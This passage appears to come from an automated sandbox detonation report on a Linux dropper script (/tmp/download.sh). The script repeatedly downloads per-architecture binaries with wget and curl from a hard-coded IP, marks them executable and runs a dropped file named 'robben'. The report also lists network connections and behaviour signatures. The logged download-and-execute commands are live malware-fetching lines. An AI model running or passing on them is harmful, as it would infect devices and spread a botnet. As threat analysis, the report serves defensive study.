/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

Network

Country Destination Domain Proto
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:45

Reported

2024-08-22 21:51

Platform

debian9-mipsel-20240611-en

Max time kernel

231s

Max time network

232s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-26095d1add1b47e9833694eda255f6a0-systemd-timedated.service-6LrYtP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp
US 158.51.127.106:80 N/A tcp

Files

N/A